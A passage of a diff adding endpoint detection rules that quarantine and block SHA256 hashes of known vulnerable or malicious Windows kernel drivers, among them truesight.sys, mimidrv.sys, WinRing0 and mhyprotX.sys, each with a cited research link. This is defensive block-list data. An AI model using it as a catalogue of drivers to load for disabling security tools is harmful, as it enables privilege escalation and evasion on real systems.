+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978934Z",
+ "creation_date": "2026-03-23T11:45:29.978936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978948Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3",
+ "comment": "Vulnerable Kernel Driver (aka Black.sys) [https://www.loldrivers.io/drivers/4b047bb8-c605-4664-baed-25bb70e864a1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "980bc68d-00c6-5359-a3cc-1fdbe8a9cd69",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142273Z",
+ "creation_date": "2026-03-23T11:45:31.142275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91d9c3744283f31c43f10a876561d6700f3be19518b853ea2709fda9105427b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98163504-9b9b-563c-80ca-25a543fbb298",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480903Z",
+ "creation_date": "2026-03-23T11:45:30.480905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "506f56996fbcd34ff8a27e6948a2e2e21e6dbf42dab6e3a6438402000b969fd1",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98173fa1-f433-56cd-8ffe-3eb14597a7bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494923Z",
+ "creation_date": "2026-03-23T11:45:31.494925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "544e22290e9fba525d2b2df5e3414dffeab7bcc35a87fa18f46a00eab18aeb33",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9818331a-6327-53d6-9d6a-48d7852fa471",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150303Z",
+ "creation_date": "2026-03-23T11:45:31.150305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b5ecb39dafef2cff4b537cd59926f522cf6bf10e01bb28100e6250ffc3cbf9a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "981c6eb3-abaa-5df6-945c-dc0f6c45cf73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146302Z",
+ "creation_date": "2026-03-23T11:45:32.146306Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcae081ec5093f2f794e0fe32456a07d2294decea356ba84f5ca7c0af407b671",
+ "comment": "Vulnerable Kernel Driver (aka ampa.sys) [https://www.loldrivers.io/drivers/ea0e7351-b65c-4c5a-9863-83b9d5efcec3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "981e9404-386b-5f2d-ace0-1dda94f9fe31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143399Z",
+ "creation_date": "2026-03-23T11:45:31.143401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1838791999449fc15002e3330be19ce6b75b26ddfda132c5b37eefc72526c67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "981fade0-290c-5433-a590-4d5afb3c4c24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468889Z",
+ "creation_date": "2026-03-23T11:45:30.468892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468901Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0feb05a7cc11793d995c920779cffeae68afabc54ffa8d8c361e5ba44fa57c8e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9820a6f1-ae4c-5ae9-a127-d631309e005f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140672Z",
+ "creation_date": "2026-03-23T11:45:31.140673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8989e81bbf4a0952dac26a326e2defad8d36dc1848a095ddceb19d9e443324d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9823f788-3c66-5e83-8bb0-ee6661f477ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154570Z",
+ "creation_date": "2026-03-23T11:45:31.154572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6a638c49b088c9abe20b7e882ddb0924ebd55330d412272e0c7b953bc2357e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98279125-1391-5a8e-bd72-8760392948cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826474Z",
+ "creation_date": "2026-03-23T11:45:31.826475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a30e3faa2799870ce719d9c56250454cc3c91508a42ed39b44b81c0d6e8cfc94",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "982d1884-55c3-5868-9391-34d4ed0900de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487684Z",
+ "creation_date": "2026-03-23T11:45:31.487686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9475319aa880489e6eec14e3d66501fc83be4395e07c4927666166fd4ece0021",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9855b557-535b-5391-8a12-75d1bce128a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975855Z",
+ "creation_date": "2026-03-23T11:45:29.975859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2353030d4ea3ad9e874a0f7ff35bbfa10562c98c949d88cabab27102bbb8e48",
+ "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "985ac503-7706-5cda-857f-653a0fe2d26c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622810Z",
+ "creation_date": "2026-03-23T11:45:29.622812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3a215473d836c1d7315f371bff4dea956d7d1b440e43b4671f6e3772bae00dd",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98716085-24c3-539f-ac5a-dc345fc05b5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829115Z",
+ "creation_date": "2026-03-23T11:45:30.829117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829122Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "122914d3e9b1a490871c4bbad1d5e7b5da9365fa1b34fac02c86873b2008770c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9884c5f5-0f98-5244-85a7-09bada13d9e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817626Z",
+ "creation_date": "2026-03-23T11:45:30.817628Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3a191ccd1df19cdf17fe6637d48266ac84c4310b013ad6973d8cb336b06ff69",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98871817-2288-55f3-a5c2-2eae8c0e39b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967344Z",
+ "creation_date": "2026-03-23T11:45:29.967346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98949474-b29d-518b-9c62-bfb084086ccf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464118Z",
+ "creation_date": "2026-03-23T11:45:30.464121Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b169a5f643524d59330fafe6e3e328e2179fc5116ee6fae5d39581467d53ac03",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98960ee9-4fd4-59f4-a2c8-50e6d490d40b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498712Z",
+ "creation_date": "2026-03-23T11:45:31.498715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "770c2dfb24bba62e826160247e0a99152da04d27e8b6e115a3f474367cb9ee9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9897001c-21d3-5425-b60f-3523835af690",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617237Z",
+ "creation_date": "2026-03-23T11:45:29.617239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b845e5e43ce9e9b645ac198549e81f45c08197aad69708d96cdb9a719eb0e29",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "989c0ab7-a942-5f7d-a300-58639fe30fe2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827479Z",
+ "creation_date": "2026-03-23T11:45:31.827482Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827487Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bb2b1b6160b22aec3cf19a98d196c84eba631c6f834f62ad2446e59ff3a036f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98a10276-5ee4-5849-b8a9-dae4ee9c2250",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612127Z",
+ "creation_date": "2026-03-23T11:45:29.612129Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f18605a691056b446c6411b7fa841b8178059bde8094cfe9013e59f4663cdf7f",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "98a659ff-17ff-5c38-95da-995b3f7d75e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155718Z",
+ "creation_date": "2026-03-23T11:45:31.155720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
